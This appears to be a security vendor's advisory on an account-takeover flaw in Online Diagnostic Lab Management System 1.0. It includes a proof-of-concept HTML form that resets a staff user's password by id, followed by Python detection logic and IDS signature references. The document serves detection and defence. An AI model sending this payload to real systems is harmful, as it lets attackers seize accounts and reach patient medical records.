Online Diagnostic Lab Management System 1.0 - Account Takeover

Application Details

Online Diagnostic Lab Management System is a web-based application that serves as an online platform for diagnostic labs to manage their patients' laboratory tests. The system also allows patients to book an appointment. Medical testing labs can use the system to manage all appointments and patient test results.


Online Diagnostic Lab Management System could allow a remote attacker to bypass security restrictions because of improper access control.


By sending a specially crafted request using the 'id', 'email', 'password' and 'cpass' parameters, an attacker could exploit this vulnerability to take over any registered staff user account.

<form action="http://localhost/odlms/classes/Users.php?f=save_client" method="post" enctype="multipart/form-data">
<input type="hidden" name="id" value="2" />
<input type="hidden" name="firstname" value="Claire" />
<input type="hidden" name="middlename" value="C" />
<input type="hidden" name="lastname" value="Blake" />
<input type="hidden" name="gender" value="Female" />
<input type="hidden" name="dob" value="1997-10-14" />
<input type="hidden" name="contact" value="09456789123" />
<input type="hidden" name="address" value="Sample Address only" />
<input type="hidden" name="email" value="" />
<input type="hidden" name="password" value="test@1234" />
<input type="hidden" name="cpass" value="test@1234" />
<input value="Submit" type="submit" />
</form>


By turning this request into a traffic file and a matching rule, we are able to detect attempts to bypass security restrictions by manipulating the vulnerable parameters.
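As an added illustration of the matching logic described above (not Idappcom's signature and not code from the project), the following Python flags a multipart POST to the save_client action of classes/Users.php that carries an 'id' together with the password-setting fields from the advisory. The sample requests are constructed inline; the path and parameter names come from the form above.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request shape taken from the advisory's proof-of-concept form.
TARGET_PATH = "/classes/users.php"      # compared case-insensitively
TARGET_ACTION = "save_client"
PASSWORD_FIELDS = {"password", "cpass"}

_DISPOSITION = re.compile(
    r'Content-Disposition:\s*form-data;\s*name="([^"]+)"', re.I)


def multipart_field_names(body: str) -> set:
    """Return the lower-cased field names present in a multipart/form-data body."""
    return {m.group(1).lower() for m in _DISPOSITION.finditer(body)}


def is_account_takeover_attempt(raw_request: str) -> bool:
    """True when a POST to Users.php?f=save_client sets a password for a given id."""
    head, _, body = raw_request.partition("\r\n\r\n")
    parts = head.split("\r\n", 1)[0].split()
    if len(parts) < 2 or parts[0].upper() != "POST":
        return False
    url = urlsplit(parts[1])
    if not url.path.lower().endswith(TARGET_PATH):
        return False
    if parse_qs(url.query).get("f", [""])[0] != TARGET_ACTION:
        return False
    fields = multipart_field_names(body)
    # Profile edits without a password change do not match the rule.
    return "id" in fields and bool(fields & PASSWORD_FIELDS)


def build_request(fields: dict, query: str = "f=save_client",
                  boundary: str = "----ConstructedBoundary") -> str:
    """Constructed sample: the multipart POST a browser sends for the advisory's form."""
    body = ""
    for name, value in fields.items():
        body += (f"--{boundary}\r\nContent-Disposition: form-data; "
                 f"name=\"{name}\"\r\n\r\n{value}\r\n")
    body += f"--{boundary}--\r\n"
    return (f"POST /odlms/classes/Users.php?{query} HTTP/1.1\r\n"
            f"Host: localhost\r\n"
            f"Content-Type: multipart/form-data; boundary={boundary}\r\n"
            f"Content-Length: {len(body)}\r\n\r\n{body}")
```

The rule matches the request shape only; whether the submitted 'id' belongs to the requesting session is something the application must enforce server-side, so a hit is a trigger for review rather than proof of compromise.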


Idappcom has created signatures 8022351 and 8022352 along with corresponding traffic files.


Traffic IQ

If you are concerned that your business may be at risk from this vulnerability or others, why not try our Traffic IQ software, which can scan your defences and report any issues. Learn more here:
